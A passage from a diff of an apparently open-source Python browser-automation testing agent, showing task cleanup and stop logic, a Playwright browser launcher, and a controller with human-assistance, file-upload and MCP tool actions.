logger.error(f"Graph execution completed with error: {message}")
|
| 1201 |
+
elif final_state and final_state.get("final_report"):
|
| 1202 |
+
status = "completed"
|
| 1203 |
+
message = "Research process completed successfully."
|
| 1204 |
+
logger.info(message)
|
| 1205 |
+
else:
|
| 1206 |
+
# If it ends without error/report (e.g., empty plan, stopped before synthesis)
|
| 1207 |
+
status = "finished_incomplete"
|
| 1208 |
+
message = "Research process finished, but may be incomplete (no final report generated)."
|
| 1209 |
+
logger.warning(message)
|
| 1210 |
+
|
| 1211 |
+
except asyncio.CancelledError:
|
| 1212 |
+
status = "cancelled"
|
| 1213 |
+
message = f"Agent run task cancelled for {self.current_task_id}."
|
| 1214 |
+
logger.info(message)
|
| 1215 |
+
# final_state will remain None or the state before cancellation if checkpointing was used
|
| 1216 |
+
except Exception as e:
|
| 1217 |
+
status = "error"
|
| 1218 |
+
message = f"Unhandled error during graph execution for {self.current_task_id}: {e}"
|
| 1219 |
+
logger.error(message, exc_info=True)
|
| 1220 |
+
# final_state will remain None or the state before the error
|
| 1221 |
+
finally:
|
| 1222 |
+
logger.info(f"Cleaning up resources for task {self.current_task_id}")
|
| 1223 |
+
task_id_to_clean = self.current_task_id
|
| 1224 |
+
|
| 1225 |
+
self.stop_event = None
|
| 1226 |
+
self.current_task_id = None
|
| 1227 |
+
self.runner = None # Mark runner as finished
|
| 1228 |
+
if self.mcp_client:
|
| 1229 |
+
await self.mcp_client.__aexit__(None, None, None)
|
| 1230 |
+
|
| 1231 |
+
# Return a result dictionary including the status and the final state if available
|
| 1232 |
+
return {
|
| 1233 |
+
"status": status,
|
| 1234 |
+
"message": message,
|
| 1235 |
+
"task_id": task_id_to_clean, # Use the stored task_id
|
| 1236 |
+
"final_state": final_state
|
| 1237 |
+
if final_state
|
| 1238 |
+
else {}, # Return the final state dict
|
| 1239 |
+
}
|
| 1240 |
+
|
| 1241 |
+
async def _stop_lingering_browsers(self, task_id):
|
| 1242 |
+
"""Attempts to stop any BrowserUseAgent instances associated with the task_id."""
|
| 1243 |
+
keys_to_stop = [
|
| 1244 |
+
key for key in _BROWSER_AGENT_INSTANCES if key.startswith(f"{task_id}_")
|
| 1245 |
+
]
|
| 1246 |
+
if not keys_to_stop:
|
| 1247 |
+
return
|
| 1248 |
+
|
| 1249 |
+
logger.warning(
|
| 1250 |
+
f"Found {len(keys_to_stop)} potentially lingering browser agents for task {task_id}. Attempting stop..."
|
| 1251 |
+
)
|
| 1252 |
+
for key in keys_to_stop:
|
| 1253 |
+
agent_instance = _BROWSER_AGENT_INSTANCES.get(key)
|
| 1254 |
+
try:
|
| 1255 |
+
if agent_instance:
|
| 1256 |
+
# Assuming BU agent has an async stop method
|
| 1257 |
+
await agent_instance.stop()
|
| 1258 |
+
logger.info(f"Called stop() on browser agent instance {key}")
|
| 1259 |
+
except Exception as e:
|
| 1260 |
+
logger.error(
|
| 1261 |
+
f"Error calling stop() on browser agent instance {key}: {e}"
|
| 1262 |
+
)
|
| 1263 |
+
|
| 1264 |
+
async def stop(self):
|
| 1265 |
+
"""Signals the currently running agent task to stop."""
|
| 1266 |
+
if not self.current_task_id or not self.stop_event:
|
| 1267 |
+
logger.info("No agent task is currently running.")
|
| 1268 |
+
return
|
| 1269 |
+
|
| 1270 |
+
logger.info(f"Stop requested for task ID: {self.current_task_id}")
|
| 1271 |
+
self.stop_event.set() # Signal the stop event
|
| 1272 |
+
self.stopped = True
|
| 1273 |
+
await self._stop_lingering_browsers(self.current_task_id)
|
| 1274 |
+
|
| 1275 |
+
def close(self):
|
| 1276 |
+
self.stopped = False
|
src/browser/__init__.py
ADDED
|
File without changes
|
src/browser/custom_browser.py
ADDED
|
@@ -0,0 +1,120 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Browser
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Custom browser implementation with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import pdb
|
| 14 |
+
|
| 15 |
+
from playwright.async_api import Browser as PlaywrightBrowser
|
| 16 |
+
from playwright.async_api import (
|
| 17 |
+
BrowserContext as PlaywrightBrowserContext,
|
| 18 |
+
)
|
| 19 |
+
from playwright.async_api import (
|
| 20 |
+
Playwright,
|
| 21 |
+
async_playwright,
|
| 22 |
+
)
|
| 23 |
+
from browser_use.browser.browser import Browser, IN_DOCKER
|
| 24 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 25 |
+
from playwright.async_api import BrowserContext as PlaywrightBrowserContext
|
| 26 |
+
import logging
|
| 27 |
+
|
| 28 |
+
from browser_use.browser.chrome import (
|
| 29 |
+
CHROME_ARGS,
|
| 30 |
+
CHROME_DETERMINISTIC_RENDERING_ARGS,
|
| 31 |
+
CHROME_DISABLE_SECURITY_ARGS,
|
| 32 |
+
CHROME_DOCKER_ARGS,
|
| 33 |
+
CHROME_HEADLESS_ARGS,
|
| 34 |
+
)
|
| 35 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 36 |
+
from browser_use.browser.utils.screen_resolution import get_screen_resolution, get_window_adjustments
|
| 37 |
+
from browser_use.utils import time_execution_async
|
| 38 |
+
import socket
|
| 39 |
+
|
| 40 |
+
from .custom_context import CustomBrowserContext
|
| 41 |
+
|
| 42 |
+
logger = logging.getLogger(__name__)
|
| 43 |
+
|
| 44 |
+
|
| 45 |
+
class CustomBrowser(Browser):
|
| 46 |
+
|
| 47 |
+
async def new_context(self, config: BrowserContextConfig | None = None) -> CustomBrowserContext:
|
| 48 |
+
"""Create a browser context"""
|
| 49 |
+
browser_config = self.config.model_dump() if self.config else {}
|
| 50 |
+
context_config = config.model_dump() if config else {}
|
| 51 |
+
merged_config = {**browser_config, **context_config}
|
| 52 |
+
return CustomBrowserContext(config=BrowserContextConfig(**merged_config), browser=self)
|
| 53 |
+
|
| 54 |
+
async def _setup_builtin_browser(self, playwright: Playwright) -> PlaywrightBrowser:
|
| 55 |
+
"""Sets up and returns a Playwright Browser instance with anti-detection measures."""
|
| 56 |
+
assert self.config.browser_binary_path is None, 'browser_binary_path should be None if trying to use the builtin browsers'
|
| 57 |
+
|
| 58 |
+
# Use the configured window size from new_context_config if available
|
| 59 |
+
if (
|
| 60 |
+
not self.config.headless
|
| 61 |
+
and hasattr(self.config, 'new_context_config')
|
| 62 |
+
and hasattr(self.config.new_context_config, 'window_width')
|
| 63 |
+
and hasattr(self.config.new_context_config, 'window_height')
|
| 64 |
+
):
|
| 65 |
+
screen_size = {
|
| 66 |
+
'width': self.config.new_context_config.window_width,
|
| 67 |
+
'height': self.config.new_context_config.window_height,
|
| 68 |
+
}
|
| 69 |
+
offset_x, offset_y = get_window_adjustments()
|
| 70 |
+
elif self.config.headless:
|
| 71 |
+
screen_size = {'width': 1920, 'height': 1080}
|
| 72 |
+
offset_x, offset_y = 0, 0
|
| 73 |
+
else:
|
| 74 |
+
screen_size = get_screen_resolution()
|
| 75 |
+
offset_x, offset_y = get_window_adjustments()
|
| 76 |
+
|
| 77 |
+
chrome_args = {
|
| 78 |
+
f'--remote-debugging-port={self.config.chrome_remote_debugging_port}',
|
| 79 |
+
*CHROME_ARGS,
|
| 80 |
+
*(CHROME_DOCKER_ARGS if IN_DOCKER else []),
|
| 81 |
+
*(CHROME_HEADLESS_ARGS if self.config.headless else []),
|
| 82 |
+
*(CHROME_DISABLE_SECURITY_ARGS if self.config.disable_security else []),
|
| 83 |
+
*(CHROME_DETERMINISTIC_RENDERING_ARGS if self.config.deterministic_rendering else []),
|
| 84 |
+
f'--window-position={offset_x},{offset_y}',
|
| 85 |
+
f'--window-size={screen_size["width"]},{screen_size["height"]}',
|
| 86 |
+
*self.config.extra_browser_args,
|
| 87 |
+
}
|
| 88 |
+
|
| 89 |
+
# check if chrome remote debugging port is already taken,
|
| 90 |
+
# if so remove the remote-debugging-port arg to prevent conflicts
|
| 91 |
+
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
| 92 |
+
if s.connect_ex(('localhost', self.config.chrome_remote_debugging_port)) == 0:
|
| 93 |
+
chrome_args.remove(f'--remote-debugging-port={self.config.chrome_remote_debugging_port}')
|
| 94 |
+
|
| 95 |
+
browser_class = getattr(playwright, self.config.browser_class)
|
| 96 |
+
args = {
|
| 97 |
+
'chromium': list(chrome_args),
|
| 98 |
+
'firefox': [
|
| 99 |
+
*{
|
| 100 |
+
'-no-remote',
|
| 101 |
+
*self.config.extra_browser_args,
|
| 102 |
+
}
|
| 103 |
+
],
|
| 104 |
+
'webkit': [
|
| 105 |
+
*{
|
| 106 |
+
'--no-startup-window',
|
| 107 |
+
*self.config.extra_browser_args,
|
| 108 |
+
}
|
| 109 |
+
],
|
| 110 |
+
}
|
| 111 |
+
|
| 112 |
+
browser = await browser_class.launch(
|
| 113 |
+
channel='chromium', # https://github.com/microsoft/playwright/issues/33566
|
| 114 |
+
headless=self.config.headless,
|
| 115 |
+
args=args[self.config.browser_class],
|
| 116 |
+
proxy=self.config.proxy.model_dump() if self.config.proxy else None,
|
| 117 |
+
handle_sigterm=False,
|
| 118 |
+
handle_sigint=False,
|
| 119 |
+
)
|
| 120 |
+
return browser
|
src/browser/custom_context.py
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Browser Context
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Custom browser context implementation with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
import logging
|
| 14 |
+
import os
|
| 15 |
+
|
| 16 |
+
from browser_use.browser.browser import Browser, IN_DOCKER
|
| 17 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 18 |
+
from playwright.async_api import Browser as PlaywrightBrowser
|
| 19 |
+
from playwright.async_api import BrowserContext as PlaywrightBrowserContext
|
| 20 |
+
from typing import Optional
|
| 21 |
+
from browser_use.browser.context import BrowserContextState
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
class CustomBrowserContext(BrowserContext):
|
| 27 |
+
def __init__(
|
| 28 |
+
self,
|
| 29 |
+
browser: 'Browser',
|
| 30 |
+
config: BrowserContextConfig | None = None,
|
| 31 |
+
state: Optional[BrowserContextState] = None,
|
| 32 |
+
):
|
| 33 |
+
super(CustomBrowserContext, self).__init__(browser=browser, config=config, state=state)
|
src/controller/__init__.py
ADDED
|
File without changes
|
src/controller/custom_controller.py
ADDED
|
@@ -0,0 +1,193 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Controller
|
| 3 |
+
============================================================
|
| 4 |
+
|
| 5 |
+
Custom browser controller with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import pdb
|
| 13 |
+
|
| 14 |
+
import pyperclip
|
| 15 |
+
from typing import Optional, Type, Callable, Dict, Any, Union, Awaitable, TypeVar
|
| 16 |
+
from pydantic import BaseModel
|
| 17 |
+
from browser_use.agent.views import ActionResult
|
| 18 |
+
from browser_use.browser.context import BrowserContext
|
| 19 |
+
from browser_use.controller.service import Controller, DoneAction
|
| 20 |
+
from browser_use.controller.registry.service import Registry, RegisteredAction
|
| 21 |
+
from main_content_extractor import MainContentExtractor
|
| 22 |
+
from browser_use.controller.views import (
|
| 23 |
+
ClickElementAction,
|
| 24 |
+
DoneAction,
|
| 25 |
+
ExtractPageContentAction,
|
| 26 |
+
GoToUrlAction,
|
| 27 |
+
InputTextAction,
|
| 28 |
+
OpenTabAction,
|
| 29 |
+
ScrollAction,
|
| 30 |
+
SearchGoogleAction,
|
| 31 |
+
SendKeysAction,
|
| 32 |
+
SwitchTabAction,
|
| 33 |
+
)
|
| 34 |
+
import logging
|
| 35 |
+
import inspect
|
| 36 |
+
import asyncio
|
| 37 |
+
import os
|
| 38 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 39 |
+
from browser_use.agent.views import ActionModel, ActionResult
|
| 40 |
+
|
| 41 |
+
from src.utils.mcp_client import create_tool_param_model, setup_mcp_client_and_tools
|
| 42 |
+
|
| 43 |
+
from browser_use.utils import time_execution_sync
|
| 44 |
+
|
| 45 |
+
logger = logging.getLogger(__name__)
|
| 46 |
+
|
| 47 |
+
Context = TypeVar('Context')
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
class CustomController(Controller):
|
| 51 |
+
def __init__(self, exclude_actions: list[str] = [],
|
| 52 |
+
output_model: Optional[Type[BaseModel]] = None,
|
| 53 |
+
ask_assistant_callback: Optional[Union[Callable[[str, BrowserContext], Dict[str, Any]], Callable[
|
| 54 |
+
[str, BrowserContext], Awaitable[Dict[str, Any]]]]] = None,
|
| 55 |
+
):
|
| 56 |
+
super().__init__(exclude_actions=exclude_actions, output_model=output_model)
|
| 57 |
+
self._register_custom_actions()
|
| 58 |
+
self.ask_assistant_callback = ask_assistant_callback
|
| 59 |
+
self.mcp_client = None
|
| 60 |
+
self.mcp_server_config = None
|
| 61 |
+
|
| 62 |
+
def _register_custom_actions(self):
|
| 63 |
+
"""Register all custom browser actions"""
|
| 64 |
+
|
| 65 |
+
@self.registry.action(
|
| 66 |
+
"When executing tasks, prioritize autonomous completion. However, if you encounter a definitive blocker "
|
| 67 |
+
"that prevents you from proceeding independently – such as needing credentials you don't possess, "
|
| 68 |
+
"requiring subjective human judgment, needing a physical action performed, encountering complex CAPTCHAs, "
|
| 69 |
+
"or facing limitations in your capabilities – you must request human assistance."
|
| 70 |
+
)
|
| 71 |
+
async def ask_for_assistant(query: str, browser: BrowserContext):
|
| 72 |
+
if self.ask_assistant_callback:
|
| 73 |
+
if inspect.iscoroutinefunction(self.ask_assistant_callback):
|
| 74 |
+
user_response = await self.ask_assistant_callback(query, browser)
|
| 75 |
+
else:
|
| 76 |
+
user_response = self.ask_assistant_callback(query, browser)
|
| 77 |
+
msg = f"AI ask: {query}. User response: {user_response['response']}"
|
| 78 |
+
logger.info(msg)
|
| 79 |
+
return ActionResult(extracted_content=msg, include_in_memory=True)
|
| 80 |
+
else:
|
| 81 |
+
return ActionResult(extracted_content="Human cannot help you. Please try another way.",
|
| 82 |
+
include_in_memory=True)
|
| 83 |
+
|
| 84 |
+
@self.registry.action(
|
| 85 |
+
'Upload file to interactive element with file path ',
|
| 86 |
+
)
|
| 87 |
+
async def upload_file(index: int, path: str, browser: BrowserContext, available_file_paths: list[str]):
|
| 88 |
+
if path not in available_file_paths:
|
| 89 |
+
return ActionResult(error=f'File path {path} is not available')
|
| 90 |
+
|
| 91 |
+
if not os.path.exists(path):
|
| 92 |
+
return ActionResult(error=f'File {path} does not exist')
|
| 93 |
+
|
| 94 |
+
dom_el = await browser.get_dom_element_by_index(index)
|
| 95 |
+
|
| 96 |
+
file_upload_dom_el = dom_el.get_file_upload_element()
|
| 97 |
+
|
| 98 |
+
if file_upload_dom_el is None:
|
| 99 |
+
msg = f'No file upload element found at index {index}'
|
| 100 |
+
logger.info(msg)
|
| 101 |
+
return ActionResult(error=msg)
|
| 102 |
+
|
| 103 |
+
file_upload_el = await browser.get_locate_element(file_upload_dom_el)
|
| 104 |
+
|
| 105 |
+
if file_upload_el is None:
|
| 106 |
+
msg = f'No file upload element found at index {index}'
|
| 107 |
+
logger.info(msg)
|
| 108 |
+
return ActionResult(error=msg)
|
| 109 |
+
|
| 110 |
+
try:
|
| 111 |
+
await file_upload_el.set_input_files(path)
|
| 112 |
+
msg = f'Successfully uploaded file to index {index}'
|
| 113 |
+
logger.info(msg)
|
| 114 |
+
return ActionResult(extracted_content=msg, include_in_memory=True)
|
| 115 |
+
except Exception as e:
|
| 116 |
+
msg = f'Failed to upload file to index {index}: {str(e)}'
|
| 117 |
+
logger.info(msg)
|
| 118 |
+
return ActionResult(error=msg)
|
| 119 |
+
|
| 120 |
+
@time_execution_sync('--act')
|
| 121 |
+
async def act(
|
| 122 |
+
self,
|
| 123 |
+
action: ActionModel,
|
| 124 |
+
browser_context: Optional[BrowserContext] = None,
|
| 125 |
+
#
|
| 126 |
+
page_extraction_llm: Optional[BaseChatModel] = None,
|
| 127 |
+
sensitive_data: Optional[Dict[str, str]] = None,
|
| 128 |
+
available_file_paths: Optional[list[str]] = None,
|
| 129 |
+
#
|
| 130 |
+
context: Context | None = None,
|
| 131 |
+
) -> ActionResult:
|
| 132 |
+
"""Execute an action"""
|
| 133 |
+
|
| 134 |
+
try:
|
| 135 |
+
for action_name, params in action.model_dump(exclude_unset=True).items():
|
| 136 |
+
if params is not None:
|
| 137 |
+
if action_name.startswith("mcp"):
|
| 138 |
+
# this is a mcp tool
|
| 139 |
+
logger.debug(f"Invoke MCP tool: {action_name}")
|
| 140 |
+
mcp_tool = self.registry.registry.actions.get(action_name).function
|
| 141 |
+
result = await mcp_tool.ainvoke(params)
|
| 142 |
+
else:
|
| 143 |
+
result = await self.registry.execute_action(
|
| 144 |
+
action_name,
|
| 145 |
+
params,
|
| 146 |
+
browser=browser_context,
|
| 147 |
+
page_extraction_llm=page_extraction_llm,
|
| 148 |
+
sensitive_data=sensitive_data,
|
| 149 |
+
available_file_paths=available_file_paths,
|
| 150 |
+
context=context,
|
| 151 |
+
)
|
| 152 |
+
|
| 153 |
+
if isinstance(result, str):
|
| 154 |
+
return ActionResult(extracted_content=result)
|
| 155 |
+
elif isinstance(result, ActionResult):
|
| 156 |
+
return result
|
| 157 |
+
elif result is None:
|
| 158 |
+
return ActionResult()
|
| 159 |
+
else:
|
| 160 |
+
raise ValueError(f'Invalid action result type: {type(result)} of {result}')
|
| 161 |
+
return ActionResult()
|
| 162 |
+
except Exception as e:
|
| 163 |
+
raise e
|
| 164 |
+
|
| 165 |
+
async def setup_mcp_client(self, mcp_server_config: Optional[Dict[str, Any]] = None):
|
| 166 |
+
self.mcp_server_config = mcp_server_config
|
| 167 |
+
if self.mcp_server_config:
|
| 168 |
+
self.mcp_client = await setup_mcp_client_and_tools(self.mcp_server_config)
|
| 169 |
+
self.register_mcp_tools()
|
| 170 |
+
|
| 171 |
+
def register_mcp_tools(self):
|
| 172 |
+
"""
|
| 173 |
+
Register the MCP tools used by this controller.
|
| 174 |
+
"""
|
| 175 |
+
if self.mcp_client:
|
| 176 |
+
for server_name in self.mcp_client.server_name_to_tools:
|
| 177 |
+
for tool in self.mcp_client.server_name_to_tools[server_name]:
|
| 178 |
+
tool_name = f"mcp.{server_name}.{tool.name}"
|
| 179 |
+
self.registry.registry.actions[tool_name] = RegisteredAction(
|
| 180 |
+
name=tool_name,
|
| 181 |
+
description=tool.description,
|
| 182 |
+
function=tool,
|
| 183 |
+
param_model=create_tool_param_model(tool),
|
| 184 |
+
)
|
| 185 |
+
logger.info(f"Add mcp tool: {tool_name}")
|
| 186 |
+
logger.debug(
|
| 187 |
+
f"Registered {len(self.mcp_client.server_name_to_tools[server_name])} mcp tools for {server_name}")
|
| 188 |
+
else:
|
| 189 |
+
logger.warning(f"MCP client not started.")
|
| 190 |
+
|
| 191 |
+
async def close_mcp_client(self):
|
| 192 |
+
if self.mcp_client:
|
| 193 |
+
await self.mcp_client.__aexit__(None, None, None)
|
src/utils/__init__.py
ADDED
|
File without changes
|
src/utils/advanced_error_handler.py
ADDED
|
@@ -0,0 +1,450 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Advanced Error Handler
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Advanced error handling, debugging, and intelligent error recovery system.
|
| 6 |
